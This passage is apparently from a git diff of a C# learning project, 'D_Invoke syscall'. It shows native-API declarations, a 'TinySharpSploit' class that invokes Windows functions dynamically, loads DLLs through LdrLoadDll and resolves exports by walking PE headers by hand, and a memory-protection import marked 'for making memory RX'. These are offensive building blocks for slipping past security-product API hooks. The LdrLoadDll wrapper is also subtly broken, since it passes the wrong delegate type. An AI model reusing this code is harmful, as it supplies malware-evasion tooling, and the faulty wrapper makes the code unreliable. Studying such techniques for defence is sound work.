DESKTOP_CREATEMENU = 0x00000004,
|
||||
DESKTOP_HOOKCONTROL = 0x00000008,
|
||||
DESKTOP_JOURNALRECORD = 0x00000010,
|
||||
DESKTOP_JOURNALPLAYBACK = 0x00000020,
|
||||
DESKTOP_ENUMERATE = 0x00000040,
|
||||
DESKTOP_WRITEOBJECTS = 0x00000080,
|
||||
DESKTOP_SWITCHDESKTOP = 0x00000100,
|
||||
WINSTA_ENUMDESKTOPS = 0x00000001,
|
||||
WINSTA_READATTRIBUTES = 0x00000002,
|
||||
WINSTA_ACCESSCLIPBOARD = 0x00000004,
|
||||
WINSTA_CREATEDESKTOP = 0x00000008,
|
||||
WINSTA_WRITEATTRIBUTES = 0x00000010,
|
||||
WINSTA_ACCESSGLOBALATOMS = 0x00000020,
|
||||
WINSTA_EXITWINDOWS = 0x00000040,
|
||||
WINSTA_ENUMERATE = 0x00000100,
|
||||
WINSTA_READSCREEN = 0x00000200,
|
||||
WINSTA_ALL_ACCESS = 0x0000037F
|
||||
}
|
||||
|
||||
// http://pinvoke.net/default.aspx/Structures/UNICODE_STRING.html
|
||||
// NtCreateThread - POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL
|
||||
[StructLayout(LayoutKind.Sequential)]
|
||||
public struct UNICODE_STRING : IDisposable
|
||||
{
|
||||
public ushort Length;
|
||||
public ushort MaximumLength;
|
||||
private IntPtr buffer;
|
||||
|
||||
public UNICODE_STRING(string s)
|
||||
{
|
||||
Length = (ushort)(s.Length * 2);
|
||||
MaximumLength = (ushort)(Length + 2);
|
||||
buffer = Marshal.StringToHGlobalUni(s);
|
||||
}
|
||||
|
||||
public void Dispose()
|
||||
{
|
||||
Marshal.FreeHGlobal(buffer);
|
||||
buffer = IntPtr.Zero;
|
||||
}
|
||||
|
||||
public override string ToString()
|
||||
{
|
||||
return Marshal.PtrToStringUni(buffer);
|
||||
}
|
||||
}
|
||||
|
||||
// http://www.pinvoke.net/default.aspx/Structures/OBJECT_ATTRIBUTES.html
|
||||
// NtCreateThread - POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL
|
||||
public struct OBJECT_ATTRIBUTES : IDisposable
|
||||
{
|
||||
public int Length;
|
||||
public IntPtr RootDirectory;
|
||||
private IntPtr objectName;
|
||||
public uint Attributes;
|
||||
public IntPtr SecurityDescriptor;
|
||||
public IntPtr SecurityQualityOfService;
|
||||
|
||||
public OBJECT_ATTRIBUTES(string name, uint attrs)
|
||||
{
|
||||
Length = 0;
|
||||
RootDirectory = IntPtr.Zero;
|
||||
objectName = IntPtr.Zero;
|
||||
Attributes = attrs;
|
||||
SecurityDescriptor = IntPtr.Zero;
|
||||
SecurityQualityOfService = IntPtr.Zero;
|
||||
|
||||
Length = Marshal.SizeOf(this);
|
||||
ObjectName = new UNICODE_STRING(name);
|
||||
}
|
||||
|
||||
public UNICODE_STRING ObjectName
|
||||
{
|
||||
get
|
||||
{
|
||||
return (UNICODE_STRING)Marshal.PtrToStructure(
|
||||
objectName, typeof(UNICODE_STRING));
|
||||
}
|
||||
|
||||
set
|
||||
{
|
||||
bool fDeleteOld = objectName != IntPtr.Zero;
|
||||
if (!fDeleteOld)
|
||||
objectName = Marshal.AllocHGlobal(Marshal.SizeOf(value));
|
||||
Marshal.StructureToPtr(value, objectName, fDeleteOld);
|
||||
}
|
||||
}
|
||||
|
||||
public void Dispose()
|
||||
{
|
||||
if (objectName != IntPtr.Zero)
|
||||
{
|
||||
Marshal.DestroyStructure(objectName, typeof(UNICODE_STRING));
|
||||
Marshal.FreeHGlobal(objectName);
|
||||
objectName = IntPtr.Zero;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// http://www.pinvoke.net/default.aspx/kernel32/VirtualProtectEx.html
|
||||
// For making memory RX
|
||||
[DllImport("kernel32.dll")]
|
||||
public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
|
||||
|
||||
// http://www.pinvoke.net/default.aspx/kernel32/VirtualProtect.html
|
||||
// For making memory RX
|
||||
public enum AllocationProtect : uint
|
||||
{
|
||||
PAGE_EXECUTE = 0x00000010,
|
||||
PAGE_EXECUTE_READ = 0x00000020,
|
||||
PAGE_EXECUTE_READWRITE = 0x00000040,
|
||||
PAGE_EXECUTE_WRITECOPY = 0x00000080,
|
||||
PAGE_NOACCESS = 0x00000001,
|
||||
PAGE_READONLY = 0x00000002,
|
||||
PAGE_READWRITE = 0x00000004,
|
||||
PAGE_WRITECOPY = 0x00000008,
|
||||
PAGE_GUARD = 0x00000100,
|
||||
PAGE_NOCACHE = 0x00000200,
|
||||
PAGE_WRITECOMBINE = 0x00000400
|
||||
}
|
||||
|
||||
// http://www.pinvoke.net/default.aspx/kernel32/GetCurrentProcess.html
|
||||
// For getting a handle to the current process
|
||||
[DllImport("kernel32.dll", SetLastError = true)]
|
||||
public static extern IntPtr GetCurrentProcess();
|
||||
|
||||
[DllImport("Kernel32.dll", SetLastError = true)]
|
||||
public static extern uint GetThreadId(IntPtr hThread);
|
||||
}
|
||||
|
||||
public class TinySharpSploit
|
||||
{
|
||||
public static Native.NTSTATUS LdrLoadDll(IntPtr PathToFile, UInt32 dwFlags, ref Native.UNICODE_STRING ModuleFileName, ref IntPtr ModuleHandle)
|
||||
{
|
||||
// Craft an array for the arguments
|
||||
object[] funcargs =
|
||||
{
|
||||
PathToFile, dwFlags, ModuleFileName, ModuleHandle
|
||||
};
|
||||
|
||||
Native.NTSTATUS retValue = (Native.NTSTATUS)DynamicAPIInvoke(@"ntdll.dll", @"LdrLoadDll", typeof(Delegates.RtlInitUnicodeString), ref funcargs);
|
||||
|
||||
// Update the modified variables
|
||||
ModuleHandle = (IntPtr)funcargs[3];
|
||||
|
||||
return retValue;
|
||||
}
|
||||
|
||||
public static void RtlInitUnicodeString(ref Native.UNICODE_STRING DestinationString, [MarshalAs(UnmanagedType.LPWStr)] string SourceString)
|
||||
{
|
||||
// Craft an array for the arguments
|
||||
object[] funcargs =
|
||||
{
|
||||
DestinationString, SourceString
|
||||
};
|
||||
|
||||
DynamicAPIInvoke(@"ntdll.dll", @"RtlInitUnicodeString", typeof(Delegates.RtlInitUnicodeString), ref funcargs);
|
||||
|
||||
// Update the modified variables
|
||||
DestinationString = (Native.UNICODE_STRING)funcargs[0];
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Dynamically invoke an arbitrary function from a DLL, providing its name, function prototype, and arguments.
|
||||
/// </summary>
|
||||
/// <author>The Wover (@TheRealWover)</author>
|
||||
/// <param name="DLLName">Name of the DLL.</param>
|
||||
/// <param name="FunctionName">Name of the function.</param>
|
||||
/// <param name="FunctionDelegateType">Prototype for the function, represented as a Delegate object.</param>
|
||||
/// <param name="Parameters">Parameters to pass to the function. Can be modified if function uses call by reference.</param>
|
||||
/// <returns>Object returned by the function. Must be unmarshalled by the caller.</returns>
|
||||
public static object DynamicAPIInvoke(string DLLName, string FunctionName, Type FunctionDelegateType, ref object[] Parameters)
|
||||
{
|
||||
IntPtr pFunction = GetLibraryAddress(DLLName, FunctionName);
|
||||
return DynamicFunctionInvoke(pFunction, FunctionDelegateType, ref Parameters);
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Dynamically invokes an arbitrary function from a pointer. Useful for manually mapped modules or loading/invoking unmanaged code from memory.
|
||||
/// </summary>
|
||||
/// <author>The Wover (@TheRealWover)</author>
|
||||
/// <param name="FunctionPointer">A pointer to the unmanaged function.</param>
|
||||
/// <param name="FunctionDelegateType">Prototype for the function, represented as a Delegate object.</param>
|
||||
/// <param name="Parameters">Arbitrary set of parameters to pass to the function. Can be modified if function uses call by reference.</param>
|
||||
/// <returns>Object returned by the function. Must be unmarshalled by the caller.</returns>
|
||||
public static object DynamicFunctionInvoke(IntPtr FunctionPointer, Type FunctionDelegateType, ref object[] Parameters)
|
||||
{
|
||||
Delegate funcDelegate = Marshal.GetDelegateForFunctionPointer(FunctionPointer, FunctionDelegateType);
|
||||
return funcDelegate.DynamicInvoke(Parameters);
|
||||
}
|
||||
|
||||
|
||||
/// <summary>
|
||||
/// Resolves LdrLoadDll and uses that function to load a DLL from disk.
|
||||
/// </summary>
|
||||
/// <author>Ruben Boonen (@FuzzySec)</author>
|
||||
/// <param name="DLLPath">The path to the DLL on disk. Uses the LoadLibrary convention.</param>
|
||||
/// <returns>IntPtr base address of the loaded module or IntPtr.Zero if the module was not loaded successfully.</returns>
|
||||
public static IntPtr LoadModuleFromDisk(string DLLPath)
|
||||
{
|
||||
Native.UNICODE_STRING uModuleName = new Native.UNICODE_STRING();
|
||||
RtlInitUnicodeString(ref uModuleName, DLLPath);
|
||||
|
||||
IntPtr hModule = IntPtr.Zero;
|
||||
Native.NTSTATUS CallResult = LdrLoadDll(IntPtr.Zero, 0, ref uModuleName, ref hModule);
|
||||
if (CallResult != Native.NTSTATUS.Success || hModule == IntPtr.Zero)
|
||||
{
|
||||
return IntPtr.Zero;
|
||||
}
|
||||
|
||||
return hModule;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Helper for getting the base address of a module loaded by the current process. This base
|
||||
/// address could be passed to GetProcAddress/LdrGetProcedureAddress or it could be used for
|
||||
/// manual export parsing. This function uses the .NET System.Diagnostics.Process class.
|
||||
/// </summary>
|
||||
/// <author>Ruben Boonen (@FuzzySec)</author>
|
||||
/// <param name="DLLName">The name of the DLL (e.g. "ntdll.dll").</param>
|
||||
/// <returns>IntPtr base address of the loaded module or IntPtr.Zero if the module is not found.</returns>
|
||||
public static IntPtr GetLoadedModuleAddress(string DLLName)
|
||||
{
|
||||
ProcessModuleCollection ProcModules = Process.GetCurrentProcess().Modules;
|
||||
foreach (ProcessModule Mod in ProcModules)
|
||||
{
|
||||
if (Mod.FileName.ToLower().EndsWith(DLLName.ToLower()))
|
||||
{
|
||||
return Mod.BaseAddress;
|
||||
}
|
||||
}
|
||||
return IntPtr.Zero;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Helper for getting the pointer to a function from a DLL loaded by the process.
|
||||
/// </summary>
|
||||
/// <author>Ruben Boonen (@FuzzySec)</author>
|
||||
/// <param name="DLLName">The name of the DLL (e.g. "ntdll.dll" or "C:\Windows\System32\ntdll.dll").</param>
|
||||
/// <param name="FunctionName">Name of the exported procedure.</param>
|
||||
/// <param name="CanLoadFromDisk">Optional, indicates if the function can try to load the DLL from disk if it is not found in the loaded module list.</param>
|
||||
/// <returns>IntPtr for the desired function.</returns>
|
||||
public static IntPtr GetLibraryAddress(string DLLName, string FunctionName, bool CanLoadFromDisk = false)
|
||||
{
|
||||
IntPtr hModule = GetLoadedModuleAddress(DLLName);
|
||||
if (hModule == IntPtr.Zero && CanLoadFromDisk)
|
||||
{
|
||||
hModule = LoadModuleFromDisk(DLLName);
|
||||
if (hModule == IntPtr.Zero)
|
||||
{
|
||||
throw new FileNotFoundException(DLLName + ", unable to find the specified file.");
|
||||
}
|
||||
}
|
||||
else if (hModule == IntPtr.Zero)
|
||||
{
|
||||
throw new DllNotFoundException(DLLName + ", Dll was not found.");
|
||||
}
|
||||
|
||||
return GetExportAddress(hModule, FunctionName);
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Given a module base address, resolve the address of a function by manually walking the module export table.
|
||||
/// </summary>
|
||||
/// <author>Ruben Boonen (@FuzzySec)</author>
|
||||
/// <param name="ModuleBase">A pointer to the base address where the module is loaded in the current process.</param>
|
||||
/// <param name="ExportName">The name of the export to search for (e.g. "NtAlertResumeThread").</param>
|
||||
/// <returns>IntPtr for the desired function.</returns>
|
||||
public static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName)
|
||||
{
|
||||
IntPtr FunctionPtr = IntPtr.Zero;
|
||||
try
|
||||
{
|
||||
// Traverse the PE header in memory
|
||||
Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C));
|
||||
Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14));
|
||||
Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18;
|
||||
Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader);
|
||||
Int64 pExport = 0;
|
||||
if (Magic == 0x010b)
|
||||
{
|
||||
pExport = OptHeader + 0x60;
|
||||
}
|
||||
else
|
||||
{
|
||||
pExport = OptHeader + 0x70;
|
||||
}
|
||||
|
||||
// Read -> IMAGE_EXPORT_DIRECTORY
|
||||
Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport);
|
||||
Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10));
|
||||
Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14));
|
||||
Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18));
|
||||
Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C));
|
||||
Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20));
|
||||
Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24));
|
||||
|
||||
// Loop the array of export name RVA's
|
||||
for (int i = 0; i < NumberOfNames; i++)
|
||||
{
|
||||
string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4))));
|
||||
if (FunctionName.Equals(ExportName, StringComparison.OrdinalIgnoreCase))
|
||||
{
|
||||
Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase;
|
||||
Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase))));
|
||||
FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA);
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
catch
|
||||
{
|
||||
// Catch parser failure
|
||||
throw new InvalidOperationException("Failed to parse module exports.");
|
||||
}
|
||||
|
||||
if (FunctionPtr == IntPtr.Zero)
|
||||
{
|
||||
// Export not found
|
||||
throw new MissingMethodException(ExportName + ", export not found.");
|
||||
}
|
||||
return FunctionPtr;
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,36 @@
|
|||
using System.Reflection;
|
||||
using System.Runtime.CompilerServices;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
// 有关程序集的一般信息由以下
|
||||
// 控制。更改这些特性值可修改
|
||||
// 与程序集关联的信息。
|
||||
[assembly: AssemblyTitle("D_Invoke syscall")]
|
||||
[assembly: AssemblyDescription("")]
|
||||
[assembly: AssemblyConfiguration("")]
|
||||
[assembly: AssemblyCompany("")]
|
||||
[assembly: AssemblyProduct("D_Invoke syscall")]
|
||||
[assembly: AssemblyCopyright("Copyright © 2021")]
|
||||
[assembly: AssemblyTrademark("")]
|
||||
[assembly: AssemblyCulture("")]
|
||||
|
||||
// 将 ComVisible 设置为 false 会使此程序集中的类型
|
||||
//对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型
|
||||
//请将此类型的 ComVisible 特性设置为 true。
|
||||
[assembly: ComVisible(false)]
|
||||
|
||||
// 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID
|
||||
[assembly: Guid("e1059ca6-33b6-4b4c-9070-a09cd05b11b2")]
|
||||
|
||||
// 程序集的版本信息由下列四个值组成:
|
||||
//
|
||||
// 主版本
|
||||
// 次版本
|
||||
// 生成号
|
||||
// 修订号
|
||||
//
|
||||
//可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值
|
||||
//通过使用 "*",如下所示:
|
||||
// [assembly: AssemblyVersion("1.0.*")]
|
||||
[assembly: AssemblyVersion("1.0.0.0")]
|
||||
[assembly: AssemblyFileVersion("1.0.0.0")]
|
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1 @@
|
|||
e1325d9359823d299d0045b0c998a6b88ab90897
|
|
@ -0,0 +1,6 @@
|
|||
E:\Learning Record\CSharp\D_Invoke syscall\obj\Debug\D_Invoke syscall.csprojAssemblyReference.cache
|
||||
E:\Learning Record\CSharp\D_Invoke syscall\obj\Debug\D_Invoke syscall.csproj.CoreCompileInputs.cache
|
||||
E:\Learning Record\CSharp\D_Invoke syscall\bin\Debug\D_Invoke syscall.exe
|
||||
E:\Learning Record\CSharp\D_Invoke syscall\bin\Debug\D_Invoke syscall.pdb
|
||||
E:\Learning Record\CSharp\D_Invoke syscall\obj\Debug\D_Invoke syscall.exe
|
||||
E:\Learning Record\CSharp\D_Invoke syscall\obj\Debug\D_Invoke syscall.pdb
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Loading…
Reference in New Issue